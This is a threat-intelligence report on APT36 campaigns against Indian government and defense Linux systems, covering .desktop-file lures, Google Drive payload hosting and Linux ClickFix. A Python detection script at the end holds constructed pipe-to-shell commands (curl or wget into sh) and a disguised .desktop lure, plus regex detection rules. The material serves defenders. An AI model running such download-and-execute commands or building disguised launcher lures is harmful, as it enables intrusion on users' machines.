
The Pakistan-linked threat actor APT36 (also known as Transparent Tribe or Mythic Leopard) has significantly evolved its cyber-espionage operations against Indian targets. A recent campaign, detailed in an August 2025 report by CloudSEK [1], reveals the group’s use of malicious Linux `.desktop` files to deploy malware. This technique is part of a broader, multi-year strategic shift by the group to target Linux environments, specifically the Indian-made BOSS Linux distribution prevalent in government and defense sectors. This expansion now includes the adaptation of the sophisticated “ClickFix” social engineering technique for Linux systems, a method previously observed primarily in Windows-based attacks [2][3].
For security leadership, the core takeaway is APT36’s demonstrated persistence and innovation in cross-platform operations. The group is systematically moving beyond its historical focus on Windows and Android to exploit the perception of Linux as a more secure environment. Their tactics now include at least four distinct infection chains, abuse of legitimate services like Google Drive for payload delivery, and the use of advanced, open-source command and control (C2) frameworks. The testing of ClickFix against Linux suggests that a fully weaponized version of this attack vector is imminent, posing a direct threat to critical infrastructure and defense networks.
* **Threat Actor:** APT36 (Transparent Tribe, Mythic Leopard), a Pakistan-linked APT group.
* **Primary Targets:** Indian government, Ministry of Defence, defense contractors, and critical infrastructure (Railways, Oil & Gas).
* **Core Techniques:** Malicious `.desktop` files, weaponized ZIP archives, Google Drive payload delivery, and OS-aware ClickFix social engineering.
* **Key Malware:** Golang-based payloads and the “Poseidon” backdoor, built on the Mythic C2 framework.
* **New Development:** Successful adaptation of the ClickFix technique for Linux, currently in a testing and reconnaissance phase.
Technical Analysis of the .desktop File Campaign
The CloudSEK investigation outlines a campaign where APT36 delivers phishing emails containing a ZIP archive. This archive holds a malicious `.desktop` file crafted to appear as a harmless PDF document. In Linux environments, `.desktop` files are shortcut files that specify how an application should be launched. APT36 abuses the `Exec` parameter within this file to execute a malicious base64-encoded script. This script is designed to download a hex-encoded payload from a Google Drive URL while simultaneously opening a legitimate decoy PDF from the same service to deceive the user. The final payload is a statically linked Golang binary that establishes persistence on the compromised host and communicates with a WebSocket C2 server [1].
This method is effective because it leverages a trusted platform (Google Drive) for hosting malicious components, increasing the likelihood of bypassing security filters. The use of a Golang binary complicates analysis for defenders, as these are often statically compiled and contain a large amount of code to sift through. The WebSocket protocol for C2 communication can also help blend malicious traffic with legitimate web traffic, making detection more challenging for traditional network monitoring tools. This campaign represents a mature evolution from earlier attacks observed by Uptycs in April 2023, which used a fake version of the “Kavach” authentication app as a lure [4].
The Evolution to ClickFix Social Engineering on Linux
A critical development in APT36’s strategy is the adoption of the ClickFix social engineering technique, as documented by Hunt.io and BleepingComputer in May 2025 [2][3]. This method moves the initial attack vector from email attachments to malicious websites, significantly broadening the potential attack surface. In this campaign, APT36 created a website impersonating India’s Ministry of Defence. The site employed browser-based operating system fingerprinting to profile visitors and serve them a tailored attack flow. Windows users were presented with a fake copyright warning, while Linux users encountered a CAPTCHA page.
For Linux targets, clicking the “I’m not a robot” button copies a shell command to the user’s clipboard. The command uses `curl` to fetch a shell script (`mapeal.sh`) from the attacker-controlled domain `trade4wealth[.]in` and pipes it directly to `sh` for execution. The user is then instructed to open the Linux run dialog (often with ALT+F2), paste the command, and run it. In its analyzed form, the script was non-destructive, merely downloading a JPEG image. This indicates a testing and reconnaissance phase where the group validated the effectiveness of the social engineering lure and the execution chain without deploying a full malware payload.
Infrastructure and Malware Capabilities
APT36 maintains a robust and redundant infrastructure to support its campaigns. The group has been linked to over 100 phishing domains, often hosted on providers like AlexHost and using deceptive top-level domains such as `.report` and `.support` to appear legitimate [7][8]. The malware deployed, particularly the Poseidon backdoor, is highly capable. Based on the open-source Mythic C2 framework, it provides the threat actors with over 40 commands, including full shell access, file upload and download capabilities, keystroke logging, and the ability to capture screenshots from the infected machine [4].
The consistent use of Golang for payloads across multiple campaigns highlights a deliberate choice to hinder analysis. The group’s ability to quickly adapt its social engineering lures—from fake security advisories [6] to impersonation of the Ministry of Defence—demonstrates a keen understanding of their target demographics. The infrastructure used in the ClickFix campaign (`trade4wealth[.]in`) has been linked to previously known APT36 operations, strengthening the attribution for these new attacks.
Relevance and Remediation Steps
This activity is highly relevant to organizations within APT36’s targeting scope, particularly those in Indian government, defense, and critical infrastructure sectors. The shift to Linux and the use of advanced social engineering techniques necessitate a review of security postures beyond traditional Windows-centric models.
Mitigation strategies should include user awareness training focused on identifying novel social engineering tactics like ClickFix, where users are asked to execute commands copied from a website. Technical controls should encompass stringent web filtering to block access to known malicious domains, implementation of application allowlisting to prevent the execution of unauthorized scripts and binaries, and deployment of Linux-capable Endpoint Detection and Response (EDR) solutions to monitor for suspicious process activity and network connections. Network monitoring should be configured to alert on outbound connections to newly registered or suspicious domains, as well as the use of WebSocket protocols to unknown external hosts.
The testing phase of the Linux ClickFix attack suggests that a more destructive payload is likely to be deployed in the future. Organizations should proactively hunt for IOCs related to these campaigns and consider simulating these TTPs in red team exercises to test defensive capabilities. Monitoring for the execution of commands that pipe `curl` or `wget` output directly to an interpreter is a key detection opportunity.
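The two detection opportunities described on this page, the abused `Exec` line in a `.desktop` lure and command lines that pipe `curl`/`wget` output into an interpreter, share the same heuristics. The script below is an added example written for this summary, not code from CloudSEK or any of the cited reports; the `.desktop` file and the process command lines it inspects are constructed samples (the base64 string decodes to a harmless `printf`), and `example.invalid` stands in for any real domain.

```python
import re
from configparser import ConfigParser

# Constructed .desktop lure: named like a PDF, but Exec runs a base64-decoded script.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Quarterly_Report.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "echo cHJpbnRmICdoaSc= | base64 -d | sh"
"""

# Constructed process command lines, as an EDR or auditd forwarder might record them.
SAMPLE_CMDLINES = [
    "sh -c 'curl -fsSL https://example.invalid/mapeal.sh | sh'",
    "wget -qO- https://example.invalid/setup.sh | bash",
    "curl -O https://example.invalid/notes.txt",          # download only, no pipe
    "python3 -m http.server 8000",                        # benign interpreter use
]

DOWNLOADER = r"\b(curl|wget)\b[^|;&]*"
INTERP = r"\b(sh|bash|dash|zsh|python3?|perl)\b"
RULES = [
    # downloader output piped straight into an interpreter (the ClickFix chain)
    ("download_to_interpreter", re.compile(DOWNLOADER + r"\|\s*" + INTERP)),
    # base64-decoded content piped into an interpreter (the .desktop Exec pattern)
    ("base64_decode_to_interpreter",
     re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*" + INTERP)),
]


def assess_command(cmd: str) -> list[str]:
    """Return the names of all rules a single command line matches."""
    return [name for name, rx in RULES if rx.search(cmd)]


def assess_desktop_file(text: str) -> list[str]:
    """Parse a .desktop file and report suspicious traits of its Exec line."""
    cp = ConfigParser(interpolation=None)   # desktop files use %U etc.; no interpolation
    cp.optionxform = str                    # keep key case (Exec, Name) as written
    cp.read_string(text)
    entry = cp["Desktop Entry"]
    exec_line = entry.get("Exec", "")
    findings = assess_command(exec_line)
    # A file presenting itself as a document has no business launching a shell.
    if re.search(r"\.(pdf|docx?|xlsx?)$", entry.get("Name", ""), re.I) and re.search(INTERP, exec_line):
        findings.append("document_name_with_shell_exec")
    return findings
```

Run `assess_desktop_file` over `.desktop` files extracted from inbound ZIP attachments and `assess_command` over process-creation events; both return an empty list for the benign samples above.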
Conclusion
APT36’s ongoing operations demonstrate a clear and calculated evolution in tactics, techniques, and procedures. The group has successfully expanded its capabilities to target Linux systems effectively, leveraging both conventional methods like malicious `.desktop` files and advanced techniques like OS-aware ClickFix social engineering. The group’s persistence, innovation, and focused targeting present a continued threat to the organizations within its scope. The current ClickFix testing against Linux systems serves as a warning that this technique will almost certainly be weaponized in upcoming campaigns. Defenders must extend robust security practices, advanced monitoring, and user training to cover their entire infrastructure, regardless of operating system.
References
1. APT36 Malware Campaign Using Desktop Entry Files and Google Drive Payload Delivery. CloudSEK. Aug. 21, 2025.
2. APT36 ClickFix Campaign: Indian Ministry of Defence. Hunt.io Research. May 2025.
3. Hackers now testing ClickFix attacks against Linux targets. BleepingComputer. May 12, 2025.
4. Cyber Espionage in India: Decoding APT-36’s New Linux Malware Campaign. Uptycs. Apr. 17, 2023.
5. What is the APT36 BOSS Linux attack? WebAsha Technologies. Jul. 7, 2025.
6. Phishing Attack: Deploying Malware on Indian Defense BOSS Linux. CYFIRMA. Jul. 4, 2025.
7. APT36 Hackers Exploit Malicious PDF Files to Attack Indian Railways, Oil, and Government Networks. Hunt.io / CyberPress. Aug. 1, 2025.
8. APT36 Hackers Target Indian Railways, Oil, and Government Systems Using Malicious PDF Files. GBHackers. Aug. 1, 2025.
9. Pakistan’s Transparent Tribe Hits Indian Defence with Linux Malware. Hackread. Jul. 8, 2025.
10. Inside the ZIP Trap: How APT36 Targets BOSS Linux to Exfiltrate Critical Data. GBHackers. Jul. 7, 2025.